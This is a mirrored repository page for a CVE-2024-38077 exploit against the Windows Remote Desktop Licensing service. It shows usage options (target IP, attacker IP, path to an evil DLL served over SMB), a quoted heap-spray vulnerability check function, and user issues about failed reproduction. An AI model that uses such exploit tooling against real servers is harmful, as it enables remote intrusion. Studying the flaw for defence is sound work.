Code Monkey home page Code Monkey logo

cve-2024-38077's Introduction

CVE-2024-38077-EXP

基于伪代码后修复的代码。

有效范围

EXP:Windows Server 2025

POC:08-25

使用

options:
  -h, --help            show this help message and exit
  --target_ip TARGET_IP
                        Target IP, eg: 192.168.120.1
  --evil_ip EVIL_IP     Evil IP, eg: 192.168.120.2
  --evil_dll_path EVIL_DLL_PATH
                        Evil dll path, eg: \smb\evil_dll.dll
  --check_vuln_exist CHECK_VULN_EXIST
                        Check vulnerability exist before exploit

参考

https://sites.google.com/site/zhiniangpeng/blogs/MadLicense

cve-2024-38077's People

Contributors

qi4l avatar

Stargazers

 avatar Droid-MAX avatar CHEN JIANG avatar  avatar  avatar kivvi3412 avatar  avatar DummyKitty avatar  avatar  avatar  avatar haha44444 avatar Matthew Linney avatar Erik avatar  avatar Tripse avatar  avatar  avatar GRNZDZBL avatar  avatar  avatar MuMu avatar  avatar 农夫三拳 avatar ycwu0509 avatar  avatar  avatar  avatar Nathan avatar  avatar ljahum avatar  avatar Lays avatar  avatar 絢辻詞 avatar kichindajesse avatar  avatar  avatar  avatar Z0ey avatar ibranch7 avatar limu avatar  avatar  avatar  avatar AFKL avatar Shiao Qu avatar Fugin1204 avatar 333 avatar LeanHe avatar Apibug avatar  avatar asdasd avatar  avatar Pinohans avatar Larry Aker avatar OKAY_TC avatar kuang avatar sql7 avatar theta avatar d0gkiller87 avatar 李三 avatar Y5ねこ avatar  avatar  avatar  avatar re.about avatar Information security reseacher avatar pyeger avatar MightyIT avatar Shear1n avatar Blyth He avatar  avatar Heroman Zhang avatar pysnow avatar  avatar Moncef khafif avatar 24156 avatar  avatar shley avatar Berent Oral avatar Varth Dader avatar  avatar EndlessParadox avatar Tii avatar  avatar Lv Yitian avatar Burden avatar Maxx avatar 0xsyr0 avatar X1NRI avatar  avatar 0xff avatar Liki4 avatar  avatar  avatar Hudson Seiler avatar clod avatar  avatar YOLOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO avatar

Watchers

Jörn Henkel avatar Lv Yitian avatar  avatar  avatar  avatar

cve-2024-38077's Issues

这检查是不是太简单粗暴了.....

def spray_lfh_chunk(size, loopsize):
    payload = b"\x00" * size
    reg_lic_keypack = construct_TLSRpcRegisterLicenseKeyPack(payload)
    try:
        for _ in range(loopsize):
            dce.request(reg_lic_keypack)
    except Exception as e:
        print("[+] Target exists vulnerability")
    else:
        print("[-] Failed to check for vulnerability.")

没有复现成功

我试了 Windows server 2025 preview 的几个版本,包括 26236 的版本,都不行。
image

师傅,Windows Server 2025测试没成功

Remote Desktop Licensing服务已开启
用sxf的检测工具可以检出

[*] Run exploit script for 1 / 3 times
[+] Get Server version: 0x40000a04
[-] Crashed, waiting for the service to restart, need 210 seconds...

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.